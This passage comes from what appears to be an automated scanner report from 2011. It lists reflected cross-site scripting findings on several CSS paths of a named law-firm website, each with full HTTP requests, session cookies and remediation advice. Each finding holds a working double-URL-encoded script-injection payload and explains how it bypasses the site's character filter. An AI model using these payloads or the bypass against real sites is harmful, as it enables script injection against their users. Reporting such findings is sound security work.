User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cac63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d010f954eb was submitted in the REST URL parameter 2. This input was echoed as cac63"><script>alert(1)</script>5d010f954eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/uicac63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d010f954eb/ui.core.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6878%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49980770f59 was submitted in the REST URL parameter 3. This input was echoed as c6878"><script>alert(1)</script>49980770f59 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.core.cssc6878%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49980770f59 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbf73%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef798e920d23 was submitted in the REST URL parameter 1. This input was echoed as fbf73"><script>alert(1)</script>f798e920d23 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cssfbf73%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef798e920d23/ui/ui.datepicker.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6749%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54913b0be8b was submitted in the REST URL parameter 2. This input was echoed as b6749"><script>alert(1)</script>54913b0be8b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/uib6749%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54913b0be8b/ui.datepicker.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45672%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f4fe8f9220 was submitted in the REST URL parameter 3. This input was echoed as 45672"><script>alert(1)</script>4f4fe8f9220 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.datepicker.css45672%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f4fe8f9220 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbd401dfa0f was submitted in the REST URL parameter 1. This input was echoed as 36a08"><script>alert(1)</script>cbd401dfa0f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css36a08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbd401dfa0f/ui/ui.dialog.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c042%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee88d9eeae49 was submitted in the REST URL parameter 2. This input was echoed as 8c042"><script>alert(1)</script>e88d9eeae49 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui8c042%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee88d9eeae49/ui.dialog.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf81b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed17f52d89 was submitted in the REST URL parameter 3. This input was echoed as bf81b"><script>alert(1)</script>ed17f52d89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.dialog.cssbf81b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed17f52d89 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cb17%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee53ecb908c0 was submitted in the REST URL parameter 1. This input was echoed as 5cb17"><script>alert(1)</script>e53ecb908c0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css5cb17%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee53ecb908c0/ui/ui.progressbar.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 612ba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b00486b426 was submitted in the REST URL parameter 2. This input was echoed as 612ba"><script>alert(1)</script>8b00486b426 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui612ba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b00486b426/ui.progressbar.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a99b88c02e was submitted in the REST URL parameter 3. This input was echoed as 13c9c"><script>alert(1)</script>4a99b88c02e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.progressbar.css13c9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a99b88c02e HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14fad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c0b0ee56be was submitted in the REST URL parameter 1. This input was echoed as 14fad"><script>alert(1)</script>9c0b0ee56be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css14fad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c0b0ee56be/ui/ui.resizable.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fcda%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c138520eda was submitted in the REST URL parameter 2. This input was echoed as 3fcda"><script>alert(1)</script>8c138520eda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui3fcda%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c138520eda/ui.resizable.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f779c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e382088a8c20 was submitted in the REST URL parameter 3. This input was echoed as f779c"><script>alert(1)</script>382088a8c20 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.resizable.cssf779c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e382088a8c20 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87253ed8d10 was submitted in the REST URL parameter 1. This input was echoed as c2d5f"><script>alert(1)</script>87253ed8d10 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cssc2d5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87253ed8d10/ui/ui.slider.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d474%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e1c925c625 was submitted in the REST URL parameter 2. This input was echoed as 7d474"><script>alert(1)</script>1e1c925c625 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui7d474%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e1c925c625/ui.slider.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb3ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede52d4ea844 was submitted in the REST URL parameter 3. This input was echoed as eb3ab"><script>alert(1)</script>de52d4ea844 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.slider.csseb3ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede52d4ea844 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5847%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e63b9f9dcf48 was submitted in the REST URL parameter 1. This input was echoed as e5847"><script>alert(1)</script>63b9f9dcf48 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /csse5847%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e63b9f9dcf48/ui/ui.tabs.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
